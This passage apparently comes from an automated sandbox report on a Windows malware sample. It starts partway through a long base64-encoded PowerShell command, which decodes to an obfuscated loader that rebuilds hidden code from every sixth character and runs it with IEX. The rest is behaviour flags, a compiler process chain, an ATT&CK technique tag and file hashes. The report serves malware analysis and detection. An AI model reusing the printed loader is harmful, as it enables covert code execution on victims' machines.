GwAOwAKAFIAYQBuAHUAbgBbAFMAawByAGkAdgBEAEYAbwByAHMAdgBsAFUAbQB1AGwAaQBsAE4AbwBuAGMAcgBJAEQAaQB2AGkAcwBtAFMAcABpAGMAaQBwAEEAbgBkAGEAbgBvAFUAcwBzAGkAbgByAEEAZwBhAG8AYQB0AE0AYQBhAG0AZAAoAFMAeQB2AGEAYQAiAG8AcAB0AGkAbQBrAEkAbgB2AGUAbgBlAFMAdABhAHQAcwByAHMAdQBtAG0AZQBuAFUAbgBoAGEAbgBlAEMAYQBsAGkAcABsAEEAbQBvAHIAaQAzAFAAcgBvAGYAaQAyAEgAagB0AGkAZAAiAFQAcgBsAHMAbwApAFMAdAByAGUAbABdAFMAcQB1AGEAdABwAEIAbwByAHQAZgB1AFcAbwBsAGYAZABiAE0AZQB0AGEAZQBsAHMAaABhAG0AcABpAFIAZQBmAGwAYQBjAEEAYwBlAGQAaQAgAEQAbwB1AGIAbABzAEsAdgBvAHQAZQB0AEUAdQB4AGkAbgBhAFMAcgBmAG8AcgB0AHAAaABhAHIAeQBpAFAAYQByAGkAcwBjAEIAYQB0AHQAbAAgAFYAcgBkAGkAbQBlAE0AaQByAGEAawB4AEYAcgB1AGcAdAB0AEEAZgB0AHIAYQBlAFkAbgBnAGwAaQByAFMAaQBnAGoAbgBuAHYAYQBsAHUAYQAgAFIAZQBjAGgAaQB2AFMAdAB1AGQAZQBvAEIAbgBiAGwAYQBpAFQAYQBhAHIAbgBkAEwAaQBuAGQAZQAgAEcAYQB1AGcAZQBHAHMAaQBsAGUAbgBlAGcAYQBtAGUAbAB0AEcAbgBhAHQAcwBTAFIAaQBnAHMAcwB0AEwAbwBjAHUAcABhAE8AdgBlAHIAdwByAE4AYQB2AG4AZwB0AEIAdQB0AGwAZQB1AFIAZQBmAG8AcgBwAFcAYQBuAGsAZQBJAE8AbABpAGUAZgBuAFQAcgBzAGsAZQBmAEIAagBlAHIAZwBvAFAAbwBlAHAAaAAoAFYAaQBzAHUAYQBpAFQAZQBzAHQAYQBuAHQAdQBzAGUAbgB0AEkAcwBvAGMAaAAgAEIAcgBhAHMAaABIAFMAbABpAG0AcwBvAE0AaQBsAGwAaQB2AEsAdQBuAGQAZQBlAFMAawBhAG0AbQBkAFAAYQBhAGsAYQApAEMAbwByAHIAZQA7AAoARwBuAG8AbQBlAFsASwBsAHUAYgBzAEQARgBhAHQAdABlAGwAUwBwAGUAYQByAGwAQgBvAHYAYQByAEkAUAByAGUAYwBhAG0AVABnAGUAcgBuAHAAYQBmAHMAcABuAG8AVQBuAGEAbgBnAHIAYwBhAHQAYQBsAHQAUwB2AGkAZwBlACgARABhAGcAYgB6ACIARgBsAGEAZABvAGsAUgBlAHMAcwBvAGUARABlAGgAeQBkAHIAQwBvAHMAaQBtAG4AYwBlAG4AdAByAGUARQBuAHAAdQBrAGwAUwBsAGEAbgBnADMAQQBuAG0AcgBrADIARABpAGMAaABvACIAQgByAGEAZAB5ACkASgBhAGwAbwB1AF0ARwBlAG4AYgByAHAAZwBpAHIAZABsAHUAQQBmAHYAZQBuAGIAUwBuAGkAYwBrAGwAZAByAHUAbgBnAGkASQBkAG8AbABvAGMAQgBvAG8AawBtACAAQQBiAHIAbwBnAHMATQBlAGwAbABlAHQAUwBpAHIAZQBzAGEAQQBmAHMAawByAHQAUAByAGEAbQBiAGkAUgB1AGwAbABlAGMAUwBuAG8AZwBzACAAQwBpAHYAaQBsAGUAQwBlAG4AdAByAHgATQB5AG8AYwBlAHQAQgByAG8AZABlAGUARgBvAHIAbQBhAHIAcABvAGwAeQBzAG4AQQBnAGEAbABlACAARQByAG4AZQBzAGkAUwBwAGkAbgBkAG4ATgBvAG4AYgB1AHQAVABhAHoAZQB0ACAAVQByAGUAdABlAFYAQQBmAGYAaQBsAGkASABqAHIAbgBlAHIASQBuAGEAbQBvAHQAbwByAGcAYQBtAHUAVABlAGQAZQB1AGEAYgBlAGsAbABhAGwAYwBvAG4AdgBlAEEAZABvAG8AbQBzAGwAVQBuAGQAZQByAGwARQBuAGMAbwBtAG8AUwB0AHQAdABlAGMATwBwAHQAbwBiACgAQgBhAGcAZQBwAGkAQgBlAHQAYQBzAG4AVABpAG4AZwBoAHQAYQBsAGwAdQB2ACAAVwBhAGkAcgBpAHYAUABlAHQAdABsADEAcABhAHIAawBlACwAQQBjAHEAdQBhAGkAYgB1AHMAaAB3AG4ARABrAGcAYwByAHQAZgB1AHQAYwBoACAAVAByAGEAbABsAHYARwByAGEAYQBzADIAQgBhAHIAbwBtACwAQQBuAGsAcgBlAGkAZABlAHIAZQBzAG4ASQBzAHMAeQBsAHQAUwBvAHUAZgBmACAARQBuAGMAZQBwAHYAQwBpAHIAYwBsADMAQQBsAHMAaQBkACwAUABsAGEAbgBsAGkAUwBjAHIAaQBtAG4AQQBkAHYAaQBzAHQAYQBuAHQAYQBiACAATQBpAGwAbABpAHYAdgBvAHQAZQByADQAVAByAGEAbgBzACkARgBvAGwAZABiADsACgBPAGYAZgBlAG4AWwBXAGgAaQBuAGkARABBAGYAbABlAGQAbABPAHYAZQByAHcAbABTAHYAYQBuAGUASQBMAGEAYgBpAGwAbQBDAG8AbQBwAGEAcABEAG8AYwBlAHIAbwBCAGkAZABlAHIAcgBCAG8AbQBiAGUAdABNAGkAbgBkAGUAKABUAHIAZQBlAHQAIgBTAHMAbAB1AGcAdwBiAGUAZABvAHQAaQBkAHUAcgBhAG0AbgBNAGUAZwBhAGwAbQBVAGQAdAByAHkAbQBIAGEAcgBrAGkALgBLAHkAdABlAHMAZABXAHIAaQB0AGgAbABFAGYAZgBlAGMAbABkAGEAZwBzAGwAIgBKAG8AdgBpAGEAKQBVAG4AcABlAHIAXQBVAHIAbwBwAGgAcABTAGUAcgB2AG8AdQBwAGwAZQBuAGkAYgBSAHUAbgBnAGUAbABTAHQAZQBwAGMAaQBIAGEAYgBpAGwAYwBBAGwAcABoAGEAIABEAHkAbgBlAGwAcwBHAGUAbgBiAHIAdABTAHAAYQBjAHkAYQBLAGUAbgBkAGUAdABBAHUAZABpAHQAaQBBAHUAdABvAHQAYwBMAHUAdABlAG8AIABHAGUAbgBiAHIAZQBhAGQAdgBvAGsAeABDAG8AcwBpAGcAdABPAHAAcwBsAG0AZQBSAGUAYQBsAGwAcgBiAGEAYQBuAGQAbgBSAGUAdAB1AG4AIABJAG4AZABlAGIAaQBTAG8AbABpAHEAbgBQAGkAdABhAGIAdABGAGUAbQBpAG4AIABTAGoAYQBrAHIAUwBLAGEAcABzAGUAZQBEAGkAcwBzAGkAbgBNAGUAbABvAGQAZABLAG4AaQBnAGgARABTAHQAeQBsAG8AcgBUAGUAcgBuAGEAaQBMAG8AdgBwAHIAdgBUAGgAaQBzAGgAZQBTAG8AdgBzAGUAcgBNAGkAYwByAG8ATQBoAG8AcgBtAG8AZQBQAHIAbwB2AGUAcwBNAHUAcwBpAGMAcwBOAG8AbgBtAHUAYQBVAG0AdQBsAGkAZwBBAGQAYQBwAHQAZQBCAHIAdQBnAGUAKABFAGYAdABlAHIAaQBLAG8AcwBtAG8AbgBpAG4AZAB2AGEAdABCAGEAawBlAHIAIABEAG8AYwBrAGUATABhAHMAdQByAGkAYQBGAG8AcgBkAHkAbgBMAGkAYgBhAHQALABMAGkAdgBlAHIAaQBSAGUAYwBlAG4AbgBQAHIAbwBmAGUAdABNAGUAbgBhAGcAIABSAHUAcwB0AHAAQwBIAG8AbQBvAHAAbwBBAHUAdABvAHQAbgBTAHUAYgB0AHIALABkAGUAcABhAGcAaQBSAGUAbgBhAG0AbgBMAGUAagBuAGkAdABVAG4AZABvAG0AIABCAHkAcABhAHQASwBGAGwAeQBnAHQAbwBGAGEAawB0AHUAbgBBAGQAZABpAGMAdABUAGUAawBuAG8ALABDAGEAcwBzAGkAaQBSAGUAcwBzAGUAbgBVAGQAcwBtAHkAdABTAGsAbwBsAGUAIABJAG4AZABlAGwAUwBLAG8AbgB0AHIAdABBAGIAYgByAGUAYQBQAGgAbwB0AG8AYQBTAGkAbgBrAGYAYgBQAGgAcgBlAG4AKQBSAGUAYwBvAG8AOwAKAEYAYQBzAHQAaABbAEwAYQBjAHUAcwBEAEQAaQBzAGEAcwBsAFUAcAByAGkAdgBsAFkAbwBrAGUAdwBJAEcAZQBuAG0AYQBtAFMAdABpAG0AaQBwAGYAZAByAGUAbABvAHQAaAByAGUAYQByAFUAZABtAHUAZwB0AE0AeQByAGUAcgAoAFIAZQBhAG0AYQAiAFMAdAByAGkAawB3AEQAZwBuAHAAcgBpAFUAbgBiAHIAYQBuAE8AdgBlAHIAaABtAFMAbwBkAGEAbABtAEYAZQB1AGQAYQAuAEYAcgBlAG0AcgBkAFMAdwBpAG0AbQBsAEEAbABsAGUAZwBsAE8AdgBlAHIAdwAiAEYAbAB1AHkAdAApAEIAbwBiAGwAbABdAEYAbwByAHIAZQBwAE8AbABpAHYAZQB1AEkAbgBkAGUAawBiAE0AZQB0AGEAdwBsAFcAYQBzAGgAdABpAEQAcgBhAG0AYQBjAHQAcgBhAG4AcwAgAEsAaQBsAGUAcgBzAE0AYQB0AHQAbwB0AEcAYQB2AG4AZQBhAEcAbwBhAGQAcwB0AEIAbwB1AGkAbABpAE4AZABzAGkAZwBjAFIAZQBpAGYAaQAgAEYAZQBtAG8AZwBlAEgAYQBsAHMAYgB4AEEAZgBzAGsAYQB0AE4AbwBuAGMAcgBlAEIAcgBzAGkAZwByAFQAeQBtAHAAYQBuAFMAcAB1AHIAZwAgAFIAdQBiAGIAZQBpAEkAcwBwAGUAbABuAFAAdQBkAHIAZQB0AFAAaQBtAGkAZQAgAEoAbwBoAG4AbgBtAEgAeQBkAHIAbwBpAEgAYQBsAGYAbABkAEYAaQBzAHMAdQBpAFAAYQBrAHYAbwBPAEEAbABnAGUAcgB1AEcAcgB1AG4AZQB0AFMAdQBiAHIAbwBNAEYAcgBlAG0AcwBlAEsAcgB5AGIAZQBzAFMAawBlAGwAZQBzAEQAaQBzAHQAYQBhAGwAaQBtAG8AdQBnAEgAZQByAG8AaQBlAE0AeQB0AGgAbwAoAFAAZQBwAHMAaQBpAEMAcgBhAHcAbABuAEgAYQBsAHMAawB0AEwAeQBuAGMAaAAgAEYAbwByAG0AaQB1AFQAZQBsAGUAZgBuAEMAaABlAGYAZwBwAEQAcgB1AHAAZQBsAEYAcgB0AHQAcgBhAFMAdAByAGkAawAsAEIAbwByAHQAbABpAFQAbwBuAGUAZwBuAE4AZwB1AGwAdAB0AE8AYQBmAGEAbgAgAFAAaAB5AHMAaQBCAEUAZwBhAGwAaQBlAEkAbQBiAHIAbwBzAFQAcgBvAHYAcgB0AEQAdQBlAGwAYQAzAE4AeQBoAGUAZAAxAFMAdQBiAGwAaQAsAEwAaQB2AHMAZgBpAFUAbgBjAG8AbgBuAEgAZQByAGIAYQB0AEgAeQBkAHIAbwAgAEMAbABpAG0AYQBTAE4AeQBzAHQAcgBwAEwAdQBuAGcAZQBpAEIAbABvAHcAbwAxAEEAdgBuAGIAZwAxAHAAZQByAGMAaQAwAEQAaQB0AHIAbwAsAGMAaABhAG4AZABpAEIAaQBiAGwAaQBuAFMAbgBrAGUAawB0AEYAbABnAGUAbgAgAE0AYQBpAHMAbwBNAEUAawBzAHAAZQBvAE0AaQBzAGYAbwBuAEwAYQBrAG8AbgBvAEIAZQBzAGsAYQBuAFcAZQBhAHQAaABvAEMAeQB0AG8AaAApAFYAYQBnAHQAcwA7AAoAUwBrAHkAZABlAFsAUwBuAG8AcgBlAEQAUgBvAHIAcwBjAGwAVQBuAGcAZABvAGwAVABhAG4AZwBsAEkASwBhAGYAZgBlAG0ARABlAG4AZAByAHAAQgBlAHMAbAB1AG8ATABlAHUAYwBvAHIAUwBhAG4AZABzAHQAUwBhAG4AagBhACgAUABsAGUAbwBuACIAVgBhAHMAawBlAGcAQgBpAGsAcwBlAGQATABhAHIAZABlAGkAQQBwAGgAbwB0ADMAUgBtAGUAYgByADIATQBpAGMAcgBvACIARQBsAG8AeABlACkARQB4AHQAcgBhAF0AVQBlAHQAYQBiAHAASABpAG4AZABlAHUAUwBwAG8AcgBvAGIAUwB0AGoAZQByAGwAUwB3AGEAbQBwAGkAUwBwAGwAaQBkAGMAUwBlAGwAagB1ACAASABlAG4AcwBsAHMASwBvAGsAawBlAHQASQBuAHQAZQByAGEARABrAGsAZQB0AHQATQBhAHkAYgBsAGkASwBuAGEAcABzAGMARwB1AGwAZgB3ACAARwBlAHMAdABiAGUAQwBoAHIAaQBzAHgAcABhAG4AdABoAHQAVQBuAHEAdQBhAGUARgByAGUAcgBlAHIAVgBpAHIAaQBkAG4AdQBuAGMAaABhACAAUwBlAG0AaQBzAGkATgBvAG4AZABpAG4AUgB0AGUAYgBsAHQAQgB1AGcAcwBwACAAUwBrAHkAZQB5AEcAVQBuAGYAcgB1AGUAcwBwAG8AcgBhAHQASgBvAHUAcgBuAFAAVABpAGwAYgBhAGkATABpAHMAdABlAHgAQwBoAGEAcgBpAGUAVABhAG4AZABlAGwAbABvAHIAYQBzACgASwBhAGEAZAB0AGkASABvAG0AbwBlAG4AUwBtAGEAcwBrAHQARwBlAG4AcgBlACAATgB5AGIAeQBnAFMAVgBpAHQAcgBhAHAAQwBoAGEAbABvAHIAQQBuAGsAbwBtAG8ATQBhAHQAdABhAGcAVgByAHQAcABsAGYAUwBpAGcAaAB0ACwATQBuAGUAbQBvAGkATQBpAHMAZgBlAG4AUwBvAG4AaQBmAHQAQwBsAGUAZQBrACAATwB2AGUAcgBmAFAAYQBuAHQAaQBxAGEAQgBvAGEAcgBmAHIAUwBhAG4AZABhACwAUwBrAGUAbQBhAGkAQQBiAG4AbwByAG4AQgBsAGEAcwB0AHQAUwB0AHUAbQBiACAAUABhAHAAaQBzAFQAUwBuAHUAcwBlAHYAUwBhAHQAaQBuAGUAWQBvAHUAbgBnAHMARQByAG8AYgByAGkAUwBhAGMAcgBpACkAUgBhAHMAZQBuADsACgBBAGcAbAB5AHAAfQAKAG0AZQB0AGEAcAAiAEEAZwBlAHIAZABAAAoARgByAGUAbQBtACQATgBlAHQAdgByAE8AQgBhAG4AawB2AHYAUABlAHIAZAB1AGUARgB1AGMAawBpAHIARQBsAGEAcwB0AHAAQgBlAHYAcgB0AHIASQBuAGEAZAB2AGkAQgByAG8AYwBoAGMATQBhAHMAawBpAGkARQBzAHQAcgBhADMARQBjAGgAbwBsAD0AVQBkAGQAYQB0AFsAUwBpAG4AbwBpAE8AQgBpAGwAbABhAHYAZABvAGIAYgBlAGUARwB1AHQAdABpAHIATgBhAGsAaABvAHAATgB5AHAAcgBpAHIARwByAGEAcwBwAGkATQBhAGEAbABiAGMASABlAG4AcwBsAGkARQBsAHYAZQByADEAQQBuAGEAawBvAF0ARgB5AHIAZQBzADoARAB5AGQAcwBkADoAUwBhAGwAaQBjAFYAQQBtAGUAcgBjAGkAQQBmAHMAawB1AHIAUwB0AG8AZgBtAHQATQB2AGgAYQBuAHUAYQBkAGEAcABhAGEAUwBpAGQAZQBzAGwAQgB5AHIAZQB0AEEATwBuAGEAbgBlAGwAQgByAHUAZwBlAGwAVgBpAGwAZABzAG8AQgB1AGUAcwBrAGMAVgBhAG4AZABsACgAUgBlAHYAZQBpADAARwBvAGIAcwB1ACwARAByAHUAcgB1ADEARgBsAGcAZQBuADAATQBvAHIAdABlADQASQBuAGwAYQBwADgAQgByAGkAcwBhADUAUgBlAHQAcwBiADcASQBtAHAAcgBvADYAQgBlAHMAawByACwATABlAGoAZQB2ADEAUgBvAGwAbABlADIAaABrAGwAZQBuADIARgBvAHIAdAB2ADgAWgBvAGwAbwBzADgAUgBlAHYAaQBzACwAVAByAGEAcABiADYAUwBvAG0AZQB3ADQARgByAGUAZABlACkACgBQAHIAbwBrAHUAJABDAHIAZQBzAHQAdABJAHMAbwBnAG8AcgBTAGwAZQBpAGcAawB2AGkAawBhAHIAYQBUAGEAcgBtAHIAcwBUAG8AYQBkAHkAcwBTAGkAbQBiAGUAZQBDAGUAbABsAGUAcgBQAGEAbABlAG8AbgBSAGUAZABjAG8APQBJAG0AcAB1AHIAKABCAHIAaQBzAGEARwBGAHIAcwB0AGUAZQBTAGMAdQBnAHUAdABQAHIAbwBmAGkALQBIAGkAcABwAG8ASQBKAGEAdQBuAHQAdABWAG8AbABsAGUAZQBHAHkAbQBuAGEAbQBQAHIAYQBlAGwAUABHAGEAbABlAG4AcgBMAHUAbABsAGEAbwBQAGEAcgB0AG4AcABPAHAAcABlAGIAZQBGAG8AcgBzAGsAcgBPAHYAZQByAGEAdABYAGEAbgB0AGgAeQBLAGEAbABrAHUAIABLAG8AbQBwAGUALQBWAGEAdQBkAGUAUABKAGEAbQB0AGwAYQBIAHkAcgBhAGMAdABPAHIAYwBoAGkAaABUAHkAZgBvAG4AIABaAG8AbwBnAGUAIgBGAGUAbQBkAG8ASABRAHUAaQBuAHoASwBDAG8AcAByAG8AQwBEAGkAdAByAG8AVQBSAGUAZwBuAGkAOgBTAGUAYQBiAGkAXABHAG8AcgBnAGUAUwBDAGEAbgBjAGUAbwBQAHkAagBhAG0AZgBVAG4AcwB1AGwAdABVAGQAcgBlAGoAdwBQAHIAagB1AGQAYQBOAG8AbgBhAGIAcgBMAHUAZgB0AGEAZQBTAHUAcABlAHIAXABNAGkAZwBuAG8AVgBMAGUAZwBpAHQAYQBQAGUAdAByAGkAbgBPAHAAcwB1AGcAZABVAHAAcwB0AHIAZwBMAGkAYwBrAGUAIgBtAGEAagBvAHIAKQBOAG8AcgBtAGEALgBFAGYAdABlAHIAUwBVAGgAbwBsAGQAZQBEAGkAcgB0AGkAbQBGAGEAcwB0AHMAaQB0AGEAbABzAHkAaABGAGwAdQBlAGcAdQBBAGwAZQB0AHIAbQBEAHYAcgBnAGEAYgBBAHMAcwBhAHMAdQBQAGUAbgB0AG8AZwAKAEEAaQByAGEAcAAkAEEAcABoAGEAbgBBAFMAdQBwAGUAcgBhAFIAZQBzAHAAbwByAEEAZABkAGkAdABnAFMAZQBtAGkAZABhAFQAagBlAG4AZQBuAEIAbwBvAHQAZQBnAEUAbgBnAGUAbABzAEsAbgBzAG8AcgBhAEEAZgBkAGUAbAB2AFAAcgBlAGMAYQAgAEcAYQByAGMAZQA9AFUAbgBwAHIAbwAgAEEAZAB2AGUAcgBbAEYAcgBpAHMAdABTAE4AYQB2AG4AbAB5AFMAYQBwAGEAagBzAE8AdgBlAHIAZwB0AFUAbgBkAGUAcgBlAFQAcgBhAHAAbABtAFIAeQBnAHMAawAuAEgAdgBpAGQAcwBDAFAAcgBzAHUAbQBvAEwAdQBjAHUAbQBuAFAAaABhAHIAbQB2AEsAaQBkAG4AYQBlAEEAZgBiAGoAZQByAFQAaABhAG4AYQB0AE0AbwBwAHAAZQBdAEYAYQBuAHUAaQA6AE8AcABwAG8AbAA6AEQAbwBsAGkAYwBGAE0AbwBuAG8AcwByAFAAcgBvAGwAZQBvAFIAbwBzAGMAaABtAE0AZQBhAHMAdQBCAGEAawBrAGwAYQBhAFUAbgBjAG8AbQBzAFIAZQBhAGcAZwBlAE8AdgBlAHIAcgA2AGkAbgB2AGUAcwA0AE8AdgBlAHIAcwBTAFQAYQBjAGgAaQB0AEEAdQB0AG8AZQByAEgAYQBsAHYAcwBpAEEAbgBrAGwAYQBuAFQAdQBkAGUAaABnAEEAYQBuAGQAZQAoAFIAYQBkAGkAbwAkAEoAbwByAGQAYQB0AFMAdABvAHIAZQByAEQAaQBjAGgAbwBrAFUAcwB0AGUAbQBhAGEAcwBzAGEAaQBzAFAAZQBqAG8AcgBzAHcAaQByAGUAZABlAFcAaABpAGYAZgByAGcAbwB1AHIAbQBuAEEAZgByAG8AYQApAAoAQgByAGkAawBzAFsAQQBmAGQAYQBtAFMAUwBrAGUAdABjAHkAUwBlAG4AZwBlAHMARwBlAG4AdgBlAHQASAB5AGUAcgBzAGUAaQBsAGwAYQB1AG0ATQB1AHQAdABvAC4AVABlAGUAdABoAFIAQQBkAHIAZQBzAHUAUgBlAGQAaQBzAG4AVAByAGEAbgBzAHQAVgB1AGwAawBhAGkATgBvAG0AaQBuAG0ASQBuAHEAdQBpAGUAQQBmAGwAYQBhAC4ARAB2AHIAZwBoAEkAVABvAHUAZwBoAG4AVABoAHcAYQBjAHQATgBvAG4AcwB0AGUAUwBhAG4AZwB0AHIAVQBuAGEAbABsAG8AUABhAGwAbQBpAHAAcQB1AGUAYQBzAFMAQQBpAHIAcwBhAGUAbwBlAGUAbgBzAHIAUwBhAGIAbwB0AHYAQwBvAGwAbwByAGkAVQBuAGMAdQByAGMASwBvAHIAcAB1AGUAQQBhAHIAaAB1AHMARwB1AGwAZgB5AC4AVABvAG8AdABoAE0AQgByAGEAaABtAGEAUwBhAG4AZABzAHIAQgBsAGEAbgBrAHMAQQBsAGwAaQBvAGgASABvAHUAbAB0AGEATABnAGUAaAB1AGwARAByAGkAawBrAF0AQgB1AG4AZwBzADoAVAByAG8AawBpADoARwB5AGwAZABpAEMAUwBlAHgAcwB5AG8AUAByAGUAZgBsAHAATQBpAGwAbABpAHkAVgBhAGcAYQBiACgAVAByAHUAbgBjACQAUwB0AG8AcgBnAEEASAB5AHAAbwBwAGEARABpAGMAYQByAHIAYQByAGIAZQBqAGcARwBhAHUAegBpAGEATgBvAG4AdgBpAG4AUgBlAHAAdABpAGcAQgBpAGsAZQByAHMATQBpAGwAagBrAGEATABlAHQAaABhAHYASQBuAGMAbwBlACwASABlAGoAZABpACAAVgBlAGcAZQB0ADAAUgBlAGkAYwBoACwAUgBpAGIAaAB1ACAAVABvAHgAaQBjACAASABlAGwAbQBpACQAQQBuAGMAeQByAE8ATABhAGQAeQBzAHYAQQBuAGEAeABpAGUAUwBhAGwAbQBlAHIAQgB5AHIAaQBuAHAAVwBvAG8AbABkAHIAWgBlAGIAcgBhAGkAVABvAHAAcwBlAGMATQByAGsAZQBsAGkAUwBxAHUAaQByADMATQBlAG4AdQBzACwARABoAGEAaQB0ACAAUQB1AGEAbgB0ACQAQQBkAHYAbwBrAEEAQQBtAGUAbABpAGEAdABhAGEAcgBlAHIATQBlAHQAZQBvAGcATwBwAHIAYQBhAGEASABqAHIAbgBlAG4ATwBlAGsAbwBuAGcAQQBuAHQAaQBtAHMAUwB0AGkAbABsAGEAawBvAG0AYgBpAHYAQgBlAHMAawB5AC4AVwBhAGsAZQBuAGMAdgBhAHIAbQBlAG8AZQBsAGUAYwB0AHUAYwBhAHIAbwBsAG4AUgB1AHMAawBuAHQAVABpAGsAYQBtACkARwBhAHIAdgBlADsACgBQAGEAdAByAGkAWwBLAG8AbgBrAHUATwBNAGkAbgBkAHMAdgBpAG4AZABpAGMAZQBCAHkAbgByAHQAcgBQAHIAbwBmAG8AcABTAHQAcgBlAHUAcgBPAGwAbABpAGUAaQBEAGUAbABmAGkAYwBBAG4AbgBhAG0AaQBLAG8AcgB0AGUAMQBmAHIAYQB0AHIAXQBNAHUAbAB0AGkAOgBIAHUAbQBhAG4AOgBCAGEAcgBrAGIARQBCAGkAdAB0AGUAbgBTAGUAcgBlAG4AdQBCAGkAcwBsAGUAbQBFAHgAYwBhAGwAUwBVAG4AaQB2AGUAeQBXAGkAdABoAGQAcwBUAGEAYgB1AGwAdABQAHIAbwB0AGUAZQBJAG4AYQBjAHQAbQBUAGUAbABlAHAATABTAHQAbwByAGUAbwBMAG8AZgB0AHMAYwBFAG0AYgBvAGwAYQBUAGgAZQBsAHMAbABJAG4AZABoAG8AZQBQAHUAbABwAG8AcwBEAGUAcABvAG4AQQBVAG4AdABhAG4AKABWAHUAbABnAGEAJABSAGkAbQBhAHMATwBVAGQAdAByAHkAdgBBAHQAdABlAG4AZQBDAGEAbgBhAGQAcgBTAHUAcABlAHIAcABQAHUAbABwAGkAcgBGAG8AcgBwAGwAaQBCAGkAbwBzAGkAYwBUAGUAcgBtAG8AaQBTAGsAcgBpAHYAMwBBAG4AZwBvAGwALABVAG4AdAB1AG4AIABDAGgAcgBvAG0AMABQAHIAZQBqAHUAKQBGAGwAbwB3AGkAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABQAGwAdQBrAGsAZQB0AHMALgBMAGUAbgBnAHQAaAAtADEAOwAgACQAaQArAD0AKAA1ACsAMQApACkADQAKAHsADQAKAAkADQAKAAkAJABTAGsAcgB1AGIAYgBlAHIAaQAgAD0AIAAkAFMAawByAHUAYgBiAGUAcgBpACAAKwAgACQAUABsAHUAawBrAGUAdABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADEAKQANAAoACQANAAoACQBpAGYAIAAoACQAUABsAHUAawBrAGUAdABzAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAFMAawByAHUAYgBiAGUAcgBpACAAPQAgACQAUwBrAHIAdQBiAGIAZQByAGkAIAArACAAIgBgAG4AIgANAAoACQAJACQAaQAgAD0AIAAkAGkAIAArACAAMQANAAoACQB9ACAACQANAAoACQAJAA0ACgAJAA0ACgB9AA0ACgANAAoADQAKAEkARQBYACAAJABTAGsAcgB1AGIAYgBlAHIAaQANAAoA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:972
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tbfvq8ju.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1064
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES568B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC566B.tmp"
      4⤵
      PID:1532

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES568B.tmp

Filesize
1KB

MD5
665502fb588ba617dff5a8de367adcb5

SHA1
0f8d9b8881156c7a58604d1241cd3f2e405c29ad

SHA256
4a2c84b9063a87851f82e643e48b5c786242e8a28cc147b460059b328f4a7992

SHA512
2881c2d8aa51b55490a0acbae3303c56e2f075ed792b726afcc6f57913e7917714567b6e6e0770ffede08e8bae7a34a22a0a80e58e2a65258e7dbe6eabb70920

Download Submit
C:\Users\Admin\AppData\Local\Temp\tbfvq8ju.dll

Filesize
4KB

MD5
87695aae2e482393241f54aa175581d1

SHA1
6543e1e3977d1b7ba03a187c485960d93360adf4

SHA256
ef93833716bd2a2df5653776b8724f6ccfe497d2789a62913a41049202a42348

SHA512
08c2425d1f3ce030a8ff8412f10911860f73a958560fb5965a1c9bdae544f1c0f6e02dbc687aa4ab313b79024a374707fec83c4a77f60be8648c8af59a99a183

Download Submit
C:\Users\Admin\AppData\Local\Temp\tbfvq8ju.pdb

Filesize
7KB

MD5
0f8951b9fba37427773fd3e81655b9e2

SHA1
3c21e19be224e8fe827f6d78087f4ca41f55399d

SHA256
cf77cbe6a13e9868a8feba6945634cd313e3c19d6746cac0b7f26c88509ae6bb

SHA512
4bc5af68b1d2ac60708f8098d45514c58cf0e413aa0457930080d815887a8c3b6b9f956c411c04a57e778f03a8a794abde0fa5983e734cd1650937d5c798fb5e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC566B.tmp

Filesize
652B

MD5
a722fb0f9f874c913fe460a5d9c85b3c

SHA1
01060b1e56cc2969c402a89c7289b5f2dd64485f

SHA256
ff82adce4c6af2a43cf5613871ed9dfda31b82414641e15c5cfe473447325966

SHA512
025203aa10e7a631e0ba080615e50925c3700456763872ebac406893317a2159995fde9b80ab9c5af36e0b97b7701a27498c4290d54d5f8b84f309b58406e952

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tbfvq8ju.0.cs

Filesize
1KB

MD5
19fd5b290598aefd6344d702f27a8781

SHA1
52763e3a36527cc2f07d80253c7fe6995ca4b1d0

SHA256
f4a28d3a3b8f78c406cfb68ebfb2ea45b55bb0e8eb310caefbb0ca7478b7cd87

SHA512
e62187ab96e9ef730d5e4c9ff973123154f5866eaac87a751dcdaac54a5a36da923c82f6cd65d6c62465f24b0f20e217c04a6e574b790a5c7710fa382e848fdb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tbfvq8ju.cmdline

Filesize
309B

MD5
3cb867a24b009b5041f696391536ae84

SHA1
4b02c23b967c97f89d58832b62ef82b5f29c90a9

SHA256
734048413609dac2d20e804305b77ee34fc3132a04bf436fdb9a3e2192a65f91

SHA512
177d9d3a5eb0c7b2702fdba7d57e128e53325806ae886edd935f78f9742ba0c99bd9c7fb9e64e8b4fb5117cb68bea5e29b258e31ffd1d7aa5393b51263f82b3b

Download Submit
memory/972-60-0x0000000073AB0000-0x000000007405B000-memory.dmp

Filesize
5.7MB

Download
memory/972-56-0x00000000757A1000-0x00000000757A3000-memory.dmp

Filesize
8KB

Download
memory/972-66-0x0000000005050000-0x0000000005150000-memory.dmp

Filesize
1024KB

Download
memory/972-67-0x0000000073AB0000-0x000000007405B000-memory.dmp

Filesize
5.7MB

Download
memory/972-68-0x0000000005050000-0x0000000005150000-memory.dmp

Filesize
1024KB

Download
